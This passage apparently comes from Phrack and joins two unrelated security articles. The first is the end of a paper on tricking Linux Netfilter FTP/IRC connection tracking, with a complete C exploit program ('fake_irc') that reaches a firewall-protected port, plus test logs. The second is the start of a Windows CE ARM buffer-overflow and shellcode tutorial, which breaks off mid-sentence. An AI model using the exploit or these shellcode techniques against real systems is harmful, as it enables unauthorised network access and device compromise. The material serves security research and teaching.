firewall can't anticipate the data connection. I confirmed that it worked
in the Linux kernel 2.4.20.

** A demonstration tool and an example of this attack are described in
APPENDIX I and APPENDIX II, respectively.

--[ 5 - Attack Scenario III - 'echo' feature of FTP reply

----[ 5.1 - Passive FTP: background information

    An FTP server is able to do a passive open for a data connection as
well. This is called passive FTP. On the contrary, FTP that does an active
open is called active FTP.

    Just before file transfer in the passive mode, the client sends a PASV
command and the server replies the corresponding message with a data port
number to the client. An example is as follows.

-> PASV\r\n
<- 227 Entering Passive Mode (192,168,20,20,42,125)\r\n

    Like a PORT command, the IP address and port number are separated by
commas. Meanwhile, when you enter a user name, the following command and
reply are exchanged.

-> USER <a user name>\r\n
<- 331 Password required for <the user name>.\r\n

----[ 5.2 - Third Trick Details

    Right after a user creates a connection to an FTP server, the server
usually requires a user name. When the client enters a login name at FTP
prompt, a USER command is sent and then the same character sequence as the
user name, which is a part of the corresponding reply, is returned like
echo. For example, a user enters the sting "Alice Lee" as a login name at
FTP prompt, the following command line is sent across the control

-> USER Alice Lee\r\n

    The FTP server usually replies to it as follows.

<- 331 Password required for Alice Lee.\r\n

("Alice Lee" is echoed.)

Blanks are able to be included in a user name.

    A malicious user can insert a arbitrary pattern in the name. For
instance, when the same pattern as the reply for passive FTP is inserted in
it, a part of the reply is arrived like a reply related to passive FTP.

-> USER 227 Entering Passive Mode (192,168,20,29,42,125)\r\n
<- 331 Password required for 227 Entering Passive Mode

    Does a firewall confuse it with a `real' passive FTP reply? Maybe most
firewalls are not deceived by the trick because the pattern is in the
middle of the reply line.

    However, suppose that the TCP window size field of the connection is
properly adjusted by the attacker when the connection is established, then
the contents can be divided into two like two separate replies.

(A) ----->USER xxxxxxxxx227 Entering Passive Mode
(B) <-----331 Password required for xxxxxxxxx
(C) ----->ACK(with no data)
(D) <-----227 Entering Passive Mode (192,168,20,20,42,125).\r\n

(where the characters "xxxxx..." are inserted garbage used to adjust the
data length.)

    I actually tested it for Netfilter/IPTables. I confirmed that Netfilter
does not mistake the line (D) for a passive FTP reply at all.

The reason is as follows.

    (B) is not a complete command line that ends with <LF>. Netfilter,
thus, never considers (D), the next packet data of (B) as the next reply.
As a result, the firewall doesn't try to parse (D).

    But, if there were a careless connection-tracking firewall, the attack
would work.

    In the case, the careless firewall would expect the client to do an
active open to the TCP port number, which is specified in the fake reply,
on the FTP server. When the attacker initiates a connection to the target
port on the server, the firewall eventually accepts the illegal connection.

--[ 6 - APPENDIX I. A demonstration tool of the second trick

I wrote an exploiting program using C language. I used the following
compilation command.

/>gcc -Wall -o fake_irc fake_irc.c

The source code is as follows.

USAGE : ./fake_irc <an FTP server IP> <a target port>
<a user name> <a password> <a file name to be downloaded>

- <an FTP server IP> : An FTP server IP that is a victim
- <a target port> : the target TCP port on the FTP server to which an
attacker wants to connect
- <a user name> : a user name used to log on the FTP server
- <a password> : a password used to log on the FTP server
- <a file name to be downloaded> : a file name to be downloaded from the
FTP server

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define BUF_SIZE 2048
#define DATA_BUF_SZ 65536
#define IRC_SERVER_PORT 6667
#define FTP_SERVER_PORT 21

static void usage(void)
 printf("USAGE : ./fake_irc "
 "<an FTP server IP> <a target port> <a user name> "
 "<a password> <a file name to be downloaded>\n");


void send_cmd(int fd, char *msg)
 if(send(fd, msg, strlen(msg), 0) < 0) {


 printf("--->%s\n", msg);

void get_reply(int fd)
 char read_buffer[BUF_SIZE];
 int size;

 //get the FTP server message
 if( (size = recv(fd, read_buffer, BUF_SIZE, 0)) < 0) {


 read_buffer[size] = '';

 printf("<---%s\n", read_buffer);

void cmd_reply_xchg(int fd, char *msg)
 send_cmd(fd, msg);

argv[0] : a program name
argv[1] : an FTP server IP
argv[2] : a target port on the FTP server host
argv[3] : a user name
argv[4] : a password
argv[5] : a file name to be downloaded
int main(int argc, char **argv)
 int fd, fd2, fd3, fd4;
 struct sockaddr_in serv_addr, serv_addr2;
 char send_buffer[BUF_SIZE];
 char *ftp_server_ip, *user_id, *pwd, *down_file;
 unsigned short target_port;
 char data_buf[DATA_BUF_SZ];
 struct sockaddr_in sa_cli;
 socklen_t client_len;
 unsigned int on = 1;
 unsigned char addr8[4];
 int datasize;

 if(argc != 6) {
  return -1;

 ftp_server_ip = argv[1];
 target_port = atoi(argv[2]);
 user_id = argv[3];
 pwd = argv[4];
 down_file = argv[5];

 if((fd = socket(AF_INET, SOCK_STREAM, 0)) <0) {
  return -1;

 bzero(&serv_addr, sizeof(struct sockaddr_in));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(FTP_SERVER_PORT);
 serv_addr.sin_addr.s_addr = inet_addr(ftp_server_ip);

 //connect to the FTP server
 if(connect(fd, (struct sockaddr *) &serv_addr, sizeof(struct sockaddr))) {
  return -1;

 //get the FTP server message

 //exchange a USER command and the reply
 sprintf(send_buffer, "USER %s\r\n", user_id);
 cmd_reply_xchg(fd, send_buffer);

 //exchange a PASS command and the reply
 sprintf(send_buffer, "PASS %s\r\n", pwd);
 cmd_reply_xchg(fd, send_buffer);

 //exchange a SYST command and the reply
 sprintf(send_buffer, "SYST\r\n");
 cmd_reply_xchg(fd, send_buffer);


 //write a PORT command
 datasize = sizeof(serv_addr);

 if(getsockname(fd, (struct sockaddr *)&serv_addr, &datasize) < 0 ) {
  return -1;

 memcpy(addr8, &serv_addr.sin_addr.s_addr, sizeof(addr8));

 sprintf(send_buffer, "PORT %hhu,%hhu,%hhu,%hhu,%hhu,%hhu\n",
  addr8[0], addr8[1], addr8[2], addr8[3],

 cmd_reply_xchg(fd, send_buffer);

 //Be a server for an active FTP data connection
 if((fd2 = socket(AF_INET, SOCK_STREAM, 0)) <0) {
  return -1;

 if(setsockopt(fd2, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0) {
  return -1;

 bzero(&serv_addr, sizeof(struct sockaddr_in));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(IRC_SERVER_PORT);
 serv_addr.sin_addr.s_addr = INADDR_ANY;

 if( bind(fd2, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0 ) {
  return -1;

 if( listen(fd2, SOMAXCONN) < 0 ) {
  return -1;

 //send a RETR command after calling listen()
 sprintf(send_buffer, "RETR %s\r\n", down_file);
 cmd_reply_xchg(fd, send_buffer);

 //accept the active FTP data connection request
 client_len = sizeof(sa_cli);
 bzero(&sa_cli, client_len);

 fd3 = accept (fd2, (struct sockaddr*) &sa_cli, &client_len);

 if( fd3 < 0 ) {
  return -1;

 //get the fake DCC command
 bzero(data_buf, DATA_BUF_SZ);

 if( recv(fd3, data_buf, DATA_BUF_SZ, 0) < 0) {
  return -1;

 ///Start of the attack
 if((fd4= socket(AF_INET, SOCK_STREAM, 0)) <0) {
  return -1;

 bzero(&serv_addr2, sizeof(struct sockaddr_in));
 serv_addr2.sin_family = AF_INET;
 serv_addr2.sin_port = htons(target_port );
 serv_addr2.sin_addr.s_addr = inet_addr(ftp_server_ip);

 if(connect(fd4, (struct sockaddr *)&serv_addr2, sizeof(struct sockaddr)))
  return -1;
  printf("\nConnected to the target port!!\n");

 //Here, communicate with the target port

 close(fd4);//close the attack connection
 /////////////The end of the attack.

 close(fd3);//close the FTP data connection

 //get the reply of FTP data transfer completion


 close(fd);//close the FTP control connection

 return 0;

}/*The end*/


--[ 7 - APPENDIX II. A demonstration example of the second attack trick

The followings are the circumstances in which I tested it actually.

The below symbol "[]" stands for a computer box.

[An attacker's host]-----[A firewall]-----[An FTP server]
(The network interfaces, eth1 and eth2 of the firewall are directly linked
to the attacker's host and server, respectively.)

    As shown in the above figure, packets being transmitted between the FTP
client(i.e., the attacker) and the FTP server pass through the linux box
with IPTables in the Linux kernel 2.4.28.

The IP addresses assigned in each box are as follows.

(a) The attacker's host :
(b) eth1 port in the Linux box :
(c) The FTP server :
(d) eth2 port in the Linux box :

    A TCP server is listening on the FTP server's host address and port
8000.  The server on port 8000 is protected by IPTables. The attacker tried
to connect illegally to port 8000 on the FTP server in this demonstration.

    The associated records during this attack are written in the following

(1) The system configurations in the firewall, including the ruleset of
(2) Tcpdump outputs on eth1 port of the firewall
(3) Tcpdump outputs on eth2 port of the firewall
(4) The file /proc/net/ip_conntrack data with the change of times. It shows
    the information on connections being tracked.
(5) DEBUGP(), printk messages for debug in the source
    files(ip_conntrack_core.c, ip_conntrack_ftp.c and ip_conntrack_irc.c).
    For the detailed messages, I activated the macro function DEBUGP() in
    the files.

    Since some characters of the messages are Korean, they have been
deleted. I am sorry for this.


(1) The system configurations in the firewall

[root@hans root]# uname -a
Linux hans 2.4.28 #2 2004. 12. 25. () 16:02:51 KST i686 unknown

[root@hans root]# lsmod
Module                  Size  Used by    Not tainted
ip_conntrack_irc        5216   0  (unused)
ip_conntrack_ftp        6304   0  (unused)
ipt_state               1056   1  (autoclean)
ip_conntrack           40312   2  (autoclean) [ip_conntrack_irc
iptable_filter          2432   1  (autoclean)
ip_tables              16992   2  [ipt_state iptable_filter]
ext3                   64032   3  (autoclean)
jbd                    44800   3  (autoclean) [ext3]
usbcore                48576   0  (unused)

[root@hans root]# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy DROP)
target     prot opt source               destination
ACCEPT     tcp  --        tcp dpt:ftp
ACCEPT     tcp  --  anywhere             anywhere           tcp dpt:auth
ACCEPT     tcp  --        tcp dpt:ircd
ACCEPT     all  --  anywhere             anywhere           state

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

[root@hans root]# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use
Iface   U     0      0        0
eth2   U     0      0        0
eth1   U     0      0        0
eth0       U     0      0        0 lo


(2) Tcpdump outputs on eth1 port of the firewall

You can see that the "partial" PORT commands were transmitted and an
illegal connection to port 8000 was established.

tcpdump -nn -i eth1 -s 0 -X

    [ phrack staff: Output removed. Do it on your own. ]


(3) Tcpdump outputs on eth2 port of the firewall

Only one PORT command w/o <CR> is shown on eth2 port since the first one
was dropped.

tcpdump -nn -i eth2 -s 0 -X

    [ phrack staff: Output removed. Get skilled. Do it yourself! ]


(4) The file /proc/net/ip_conntrack data with change of times.

The file /proc/net/ip_conntrack shows the information on connections being
tracked. To that end, I executed the following shell command.

/>watch -n 1 "data >> /tmp/ipconn.txt;cat /proc/net/ip_conntrack >>

Note : Connections that are not associated with this test are seen from
time to time. I am sorry for this.

    [ phrack staff: Output removed. Use the force luke! ]

(5) dmesg outputs

->The following paragraph in the message shows that the first PORT command
w/o <CR> was regarded as "partial" and thus dropped.

Dec 31 15:03:40 hans kernel: find_pattern `PORT': dlen = 23
Dec 31 15:03:40 hans kernel: Pattern matches!
Dec 31 15:03:40 hans kernel: Skipped up to ` '!
Dec 31 15:03:40 hans kernel: Char 17 (got 5 nums) `10' unexpected
Dec 31 15:03:40 hans kernel: conntrack_ftp: partial PORT 1273167371+23

->The following paragraph shows that the second invalid PORT command w/o
<CR> was accepted because it was regarded as a packet that had a wrong
sequence position.(i.e., the packet was not regarded as an FTP command)

Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d7369080
Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23
Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23 ends in \n
Dec 31 15:03:40 hans kernel: ip_conntrack_ftp_help: wrong seq pos

->The following shows that the connection-tracking module mistook the FTP
data connection for IRC.

Dec 31 15:03:40 hans kernel: ip_conntrack_in: new packet for d73691c0
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:Conntrackinfo = 2
Dec 31 15:03:40 hans kernel: Confirming conntrack d73691c0

->The following shows that ip_conntrack_irc mistook the packet contents of
the FTP data connection for a DCC CHAT command and "expected" the fake
chatting connection.

Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d73691c0
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC found in master
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC CHAT  detected
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC bound ip/port:
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:tcph->seq = 3731565152
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:wrote info
seq=1613392874  (ofs=33), len=21
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:expect_related
Dec 31 15:03:40 hans kernel: ip_conntrack_expect_related d73691c0
Dec 31 15:03:40 hans kernel: tuple: tuple d6c61d94: 6 ->
Dec 31 15:03:40 hans kernel: mask:  tuple d6c61da4: 65535 ->
Dec 31 15:03:40 hans kernel: new expectation d7cf82e0 of conntrack d73691c0

->The following shows that ip_conntrack, after all, accepted the illegal
connection to port 8000 under the stateful inspection rule.

Dec 31 15:03:40 hans kernel: conntrack: expectation arrives ct=d7369260
Dec 31 15:03:41 hans kernel: ip_conntrack_in: related packet for d7369260
Dec 31 15:03:41 hans kernel: Confirming conntrack d7369260
Dec 31 15:03:41 hans kernel: ip_conntrack_in: normal packet for d7369260

Hacking Windows CE (pocketpcs & others)

--[ 1 - Abstract  The network features of PDAs and mobiles are becoming more and more powerful, so their related security problems are attracting more and more attentions. This paper will show a buffer overflow exploitation example in Windows CE. It will cover knowledges about ARM architecture, memory management and the features of processes and threads of Windows CE. It also shows how to write a shellcode in Windows CE, including knowledges about decoding shellcode of Windows CE with ARM processor.   --[ 2 - Windows CE Overview  Windows CE is a very popular embedded operating system for PDAs and mobiles. As the name, it's developed by Microsoft. Because of the similar APIs, the Windows developers can easily develop applications for Windows CE. Maybe this is an important reason that makes Windows CE popular. Windows CE 5.0 is the latest version, but Windows is the most useful version, and this paper is based on Windows  For marketing reason, Windows Mobile Software for Pocket PC and Smartphone are considered as independent products, but they are also based on the core of Windows CE.  By default, Windows CE is in little-endian mode and it supports several processors.   --[ 3 - ARM Architecture  ARM processor is the most popular chip in PDAs and mobiles, almost all of the embedded devices use ARM as CPU. ARM processors are typical RISC processors in that they implement a load/store architecture. Only load and store instructions can access memory. Data processing instructions operate on register contents only.  There are six major versions of ARM architecture. These are denoted by the version numbers 1 to 6.  ARM processors support up to seven processor modes, depending on the architecture version. These modes are: User, FIQ-Fast Interrupt Request, IRQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System mode requires ARM architecture v4 and above. All modes except User mode are referred to as privileged mode. Applications usually execute in User mode, but on Pocket PC all applications appear to run in kernel mode, and we'll talk about it late.  ARM processors have 37 registers. The registers are arranged in partially overlapping banks. There is a different register bank for each processor mode. The banked registers give rapid context switching for dealing with processor exceptions and privileged operations.   In ARM architecture v3 and above, there are 30 general-purpose 32-bit registers, the program counter(pc) register, the Current Program Status Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen general-purpose registers are visible at any one time, depending on the current processor mode. The visible general-purpose registers are from r0 to r14.  By convention, r13 is used as a stack pointer(sp) in ARM assembly language.  The C and C++ compilers always use r13 as the stack pointer.  In User mode and System mode, r14 is used as a link register(lr) to store the return address when a subroutine call is made. It can also be used as a general-purpose register if the return address is stored in the stack.  The program counter is accessed as r15(pc). It is incremented by four bytes for each instruction in ARM state, or by two bytes in Thumb state. Branch instructions load the destination address into the pc register.  You can load the pc register directly using data operation instructions. This feature is different from other processors and it is useful while writing shellcode.   --[ 4 - Windows CE Memory Management  Understanding memory management is very important for buffer overflow exploit. The memory management of Windows CE is very different from other operating systems, even other Windows systems.   Windows CE uses ROM (read only memory) and RAM (random access memory).  The ROM stores the entire operating system, as well as the applications that are bundled with the system. In this sense, the ROM in a Windows CE system is like a small read-only hard disk. The data in ROM can be maintained without power of battery. ROM-based DLL files can be designated as Execute in Place. XIP is a new feature of Windows That is, they're executed directly from the ROM instead of being loaded into program RAM and then executed. It is a big advantage for embedded systems. The DLL code doesn't take up valuable program RAM and it doesn't have to be copied into RAM before it's launched. So it takes less time to start an application. DLL files that aren't in ROM but are contained in the object store or on a Flash memory storage card aren't executed in place; they're copied into the RAM and then executed.  The RAM in a Windows CE system is divided into two areas: program memory and object store.  The object store can be considered something like a permanent virtual RAM disk. Unlike the RAM disks on a PC, the object store maintains the files stored in it even if the system is turned off. This is the reason that Windows CE devices typically have a main battery and a backup battery. They provide power for the RAM to maintain the files in the object store. Even when the user hits the reset button, the Windows CE kernel starts up looking for a previously created object store in RAM and uses that store if it finds one.  Another area of the RAM is used for the program memory. Program memory is used like the RAM in personal computers. It stores the heaps and stacks for the applications that are running. The boundary between the object store and the program RAM is adjustable. The user can move the dividing line between object store and program RAM using the System Control Panel applet.  Windows CE is a 32-bit operating system, so it supports 4GB virtual address space. The layout is as following:  +----------------------------------------+ 0xFFFFFFFF |   |   |  Kernel Virtual Address:       | |   | 2 |  KPAGE Trap Area,              | |   | G |  KDataStruct, etc              | |   | B |  ...                           | |   |   |--------------------------------+ 0xF0000000 | 4 | K |  Static Mapped Virtual Address | | G | E |  ...                           | | B | R |  ...                           | |   | N |--------------------------------+ 0xC4000000 | V | E |  NK.EXE                        | | I | L |--------------------------------+ 0xC2000000 | R |   |  ...                           | | T |   |  ...                           | | U |---|--------------------------------+ 0x80000000 | A |   |  Memory Mapped Files           | | L | 2 |  ...                           | |   | G |--------------------------------+ 0x42000000 | A | B |  Slot 32 Process 32            | | D |   |--------------------------------+ 0x40000000 | D | U |  ...                           | | R | S |--------------------------------+ 0x08000000 | E | E |  Slot 3  DEVICE.EXE            | | S | R |--------------------------------+ 0x06000000 | S |   |  Slot 2  FILESYS.EXE           | |   |   |--------------------------------+ 0x04000000 |   |   |  Slot 1  XIP DLLs              | |   |   |--------------------------------+ 0x02000000 |   |   |  Slot 0  Current Process       | +---+---+--------------------------------+ 0x00000000  The upper 2GB is kernel space, used by the system for its own data. And the lower 2GB is user space. From 0x42000000 to below 0x80000000 memories are used for large memory allocations, such as memory-mapped files, object store is in here. From 0 to below 0x42000000 memories are divided into 33 slots, each of which is 32MB.  Slot 0 is very important; it's for the currently running process. The virtual address space layout is as following:  +---+------------------------------------+ 0x02000000 |   |     DLL Virtual Memory Allocations | | S |   +--------------------------------| | L |   |  ROM DLLs:R/W Data             | | O |   |--------------------------------| | T |   |  RAM DLL+OverFlow ROM DLL:     | | 0 |   |  Code+Data                     | |   |   +--------------------------------| | C +------+-----------------------------| | U        |                  A          | | R        V                  |          | | R +-------------------------+----------| | E |  General Virtual Memory Allocations| | N |   +--------------------------------| | T |   |  Process VirtualAlloc() calls  | |   |   |--------------------------------| | P |   |       Thread Stack             | | R |   |--------------------------------| | O |   |       Process Heap             | | C |   |--------------------------------| | E |   |       Thread Stack             | | S |---+--------------------------------| | S |      Process Code and Data         | |   |------------------------------------+ 0x00010000 |   |    Guard Section(64K)+UserKInfo    | +---+------------------------------------+ 0x00000000  First 64 KB reserved by the OS. The process' code and data are mapped from 0x00010000, then followed by stacks and heaps. DLLs loaded into the top address. One of the new features of Windows is the expansion of an application's virtual address space from 32 MB, in earlier versions of Windows CE, to 64 MB, because the Slot 1 is used as XIP.   --[ 5 - Windows CE Processes and Threads  Windows CE treats processes in a different way from other Windows systems. Windows CE limits 32 processes being run at any one time. When the system starts, at least four processes are created: NK.EXE, which provides the kernel service, it's always in slot 97; FILESYS.EXE, which provides file system service, it's always in slot 2; DEVICE.EXE, which loads and maintains the device drivers for the system, it's in slot 3 normally; and GWES.EXE, which provides the GUI support, it's in slot 4 normally. The other processes are also started, such as EXPLORER.EXE.  Shell is an interesting process because it's not even in the ROM. SHELL.EXE is the Windows CE side of CESH, the command line-based monitor. The only way to load it is by connecting the system to the PC debugging station so that the file can be automatically downloaded from the PC. When you use Platform Builder to debug the Windows CE system, the SHELL.EXE will be loaded into the slot after FILESYS.EXE.  Threads under Windows CE are similar to threads under other Windows systems. Each process at least has a primary thread associated with it upon starting even if it never explicitly created one. And a process can create any number of additional threads, it's only limited by available memory.  Each thread belongs to a particular process and shares the same memory space. But SetProcPermissions(-1) gives the current thread access to any process. Each thread has an ID, a private stack and a set of registers. The stack size of all threads created within a process is set by the linker when the application is compiled.  The IDs of process and thread in Windows CE are the handles of the corresponding process and thread. It's funny, but it's useful while programming.  When a process is loaded, system will assign the next available slot to it . DLLs loaded into the slot and then followed by the stack and default process heap. After this, then executed.  When a process' thread is scheduled, system will copy from its slot into slot 0. It isn't a real copy operation; it seems just mapped into slot 0. This is mapped back to the original slot allocated to the process if the process becomes inactive. Kernel, file system, windowing system all runs in their own slots  Processes allocate stack for each thread, the default size is 64KB, depending on link parameter when the program is compiled. The top 2KB is used to guard against stack overflow, we can't destroy this memory, otherwise, the system will freeze. And the remained available for use.  Variables declared inside functions are allocated in the stack. Thread's stack memory is reclaimed when it terminates.   --[ 6 - Windows CE API Address Search Technology  We must have a shellcode to run under Windows CE before exploit. Windows CE implements as Win32 compatibility. Coredll provides the entry points for most APIs supported by Windows CE. So it is loaded by every process. The coredll.dll is just like the kernel32.dll and ntdll.dll of other Win32 systems. We have to search necessary API addresses from the coredll.dll and then use these APIs to implement our shellcode. The traditional method to implement shellcode under other Win32 systems is to locate the base address of kernel32.dll via PEB structure and then search API addresses via PE header.  Firstly, we have to locate the base address of the coredll.dll. Is there a structure like PEB under Windows CE? The answer is yes. KDataStruct is an important kernel structure that can be accessed from user mode using the fixed address PUserKData and it keeps important system data, such as module list, kernel heap, and API set pointer table (SystemAPISets).  KDataStruct is defined in nkarm.h:  // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h struct KDataStruct {     LPDWORD lpvTls;         /* 0x000 Current thread local storage pointer */     HANDLE  ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */     char    bResched;       /* 0x084 reschedule flag */     char    cNest;          /* 0x085 kernel exception nesting */     char    bPowerOff;      /* 0x086 TRUE during "power off" processing */     char    bProfileOn;     /* 0x087 TRUE if profiling enabled */     ulong   unused;         /* 0x088 unused */     ulong   rsvd2;          /* 0x08c was DiffMSec */     PPROCESS pCurPrc;       /* 0x090 ptr to current PROCESS struct */     PTHREAD pCurThd;        /* 0x094 ptr to current THREAD struct */     DWORD   dwKCRes;        /* 0x098  */     ulong   handleBase;     /* 0x09c handle table base address */     PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */     LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */     LPVOID  alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */     ulong   pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */     uchar   *pMap;          /* 0x2a4 ptr to MemoryMap array */     DWORD   dwInDebugger;   /* 0x2a8 !0 when in debugger */     PTHREAD pCurFPUOwner;   /* 0x2ac current FPU owner */     PPROCESS pCpuASIDPrc;   /* 0x2b0 current ASID proc */     long    nMemForPT;      /* 0x2b4 - Memory used for PageTables */      long    alPad[18];      /* 0x2b8 - padding */     DWORD   aInfo[32];      /* 0x300 - misc. kernel info */     // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h         #define KINX_PROCARRAY  0   /* 0x300 address of process array */         #define KINX_PAGESIZE   1   /* 0x304 system page size */         #define KINX_PFN_SHIFT  2   /* 0x308 shift for page # in PTE */         #define KINX_PFN_MASK   3   /* 0x30c mask for page # in PTE */         #define KINX_PAGEFREE   4   /* 0x310 # of free physical pages */         #define KINX_SYSPAGES   5   /* 0x314 # of pages used by kernel */         #define KINX_KHEAP      6   /* 0x318 ptr to kernel heap array */         #define KINX_SECTIONS   7   /* 0x31c ptr to SectionTable array */         #define KINX_MEMINFO    8   /* 0x320 ptr to system MemoryInfo struct */         #define KINX_MODULES    9   /* 0x324 ptr to module list */         #define KINX_DLL_LOW   10   /* 0x328 lower bound of DLL shared space */         #define KINX_NUMPAGES  11   /* 0x32c total # of RAM pages */         #define KINX_PTOC      12   /* 0x330 ptr to ROM table of contents */         #define KINX_KDATA_ADDR 13  /* 0x334 kernel mode version of KData */         #define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */         #define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */         #define KINX_PENDEVENTS 16  /* 0x340 bit mask for pending interrupt events */         #define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */         #define KINX_API_MASK 18    /* 0x348 bit mask for registered api sets */         #define KINX_NLS_CP 19      /* 0x34c hiword OEM code page, loword ANSI code page */         #define KINX_NLS_SYSLOC 20  /* 0x350 Default System locale */         #define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */         #define KINX_HEAP_WASTE 22  /* 0x358 Kernel heap wasted space */         #define KINX_DEBUGGER 23    /* 0x35c For use by debugger for protocol communication */         #define KINX_APISETS 24     /* 0x360 APIset pointers */         #define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */         #define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */         #define KINX_NKSECTION  27  /* 0x36c Address of NKSection */         #define KINX_PWR_EVTS   28  /* 0x370 Events to be set after power on */          #define KINX_NKSIG     31   /* 0x37c last entry of KINFO -- signature when NK is ready */         #define NKSIG          0x4E4B5347       /* signature "NKSG" */                             /* 0x380 - interlocked api code */                             /* 0x400 - end */ };  /* KDataStruct */  /* High memory layout  *  * This structure is mapped in at the end of the 4GB virtual  * address space.  *  *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)  *  0xFFFD4000 - disabled for protection  *  0xFFFE0000 - second level page tables (uncached)  *  0xFFFE4000 - disabled for protection  *  0xFFFF0000 - exception vectors  *  0xFFFF0400 - not used (r/o)  *  0xFFFF1000 - disabled for protection  *  0xFFFF2000 - r/o (physical overlaps with vectors)  *  0xFFFF2400 - Interrupt stack (1k)  *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)  *  0xFFFF3000 - disabled for protection  *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)  *  0xFFFF4900 - Abort stack (2k - 256 bytes)  *  0xFFFF5000 - disabled for protection  *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)  *  0xFFFF6800 - FIQ stack (256 bytes)  *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)  *  0xFFFF7000 - disabled  *  0xFFFFC000 - kernel stack  *  0xFFFFC800 - KDataStruct  *  0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)  */   The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and 0x00005800 on other CPUs. The last member of KDataStruct is aInfo. It offsets 0x300 from the start address of KDataStruct structure. Member aInfo is a DWORD array, there is a pointer to module list in index 9(KINX_MODULES), and it's defined in pkfuncs.h. So offsets 0x324 from 0xFFFFC800 is the pointer to the module list.  Well, let's look at the Module structure. I marked the offsets of the Module structure as following:  // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h typedef struct Module {     LPVOID      lpSelf;                 /* 0x00 Self pointer for validation */     PMODULE     pMod;                   /* 0x04 Next module in chain */     LPWSTR      lpszModName;            /* 0x08 Module name */     DWORD       inuse;                  /* 0x0c Bit vector of use */     DWORD       calledfunc;             /* 0x10 Called entry but not exit */     WORD        refcnt[MAX_PROCESSES];  /* 0x14 Reference count per process*/     LPVOID      BasePtr;                /* 0x54 Base pointer of dll load (not 0 based) */     DWORD       DbgFlags;               /* 0x58 Debug flags */     LPDBGPARAM  ZonePtr;                /* 0x5c Debug zone pointer */     ulong       startip;                /* 0x60 0 based entrypoint */     openexe_t   oe;                     /* 0x64 Pointer to executable file handle */     e32_lite    e32;                    /* 0x74 E32 header */     // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h       typedef struct e32_lite {           /* PE 32-bit .EXE header               */           unsigned short  e32_objcnt;     /* 0x74 Number of memory objects            */           BYTE            e32_cevermajor; /* 0x76 version of CE built for             */           BYTE            e32_ceverminor; /* 0x77 version of CE built for             */           unsigned long   e32_stackmax;   /* 0x78 Maximum stack size                  */           unsigned long   e32_vbase;      /* 0x7c Virtual base address of module      */           unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image    */           unsigned long e32_sect14rva;    /* 0x84 section 14 rva */           unsigned long e32_sect14size;   /* 0x88 section 14 size */           struct info e32_unit[LITE_EXTRA]; /* 0x8c  Array of extra info units     */             // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h             struct info {                       /* Extra information header block      */                 unsigned long   rva;            /* Virtual relative address of info    */                 unsigned long   size;           /* Size of information block           */             }             // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h             #define EXP             0           /* 0x8c Export table position          */             #define IMP             1           /* 0x94 Import table position          */             #define RES             2           /* 0x9c Resource table position        */             #define EXC             3           /* 0xa4 Exception table position       */             #define SEC             4           /* 0xac Security table position        */             #define FIX             5           /* 0xb4 Fixup table position           */              #define LITE_EXTRA      6           /* Only first 6 used by NK */         } e32_lite, *LPe32_list;     o32_lite    *o32_ptr;               /* 0xbc  O32 chain ptr */     DWORD       dwNoNotify;             /* 0xc0  1 bit per process, set if notifications disabled */     WORD        wFlags;                 /* 0xc4 */     BYTE        bTrustLevel;            /* 0xc6 */     BYTE        bPadding;               /* 0xc7 */     PMODULE     pmodResource;           /* 0xc8 module that contains the resources */     DWORD       rwLow;                  /* 0xcc base address of RW section for ROM DLL */     DWORD       rwHigh;                 /* 0xd0 high address RW section for ROM DLL */     PGPOOL_Q    pgqueue;                /* 0xcc list of the page owned by the module */ } Module;   Module structure is defined in kernel.h. The third member of Module structure is lpszModName, which is the module name string pointer and it offsets 0x08 from the start of the Module structure. The Module name is unicode string. The second member of Module structure is pMod, which is an address that point to the next module in chain. So we can locate the coredll module by 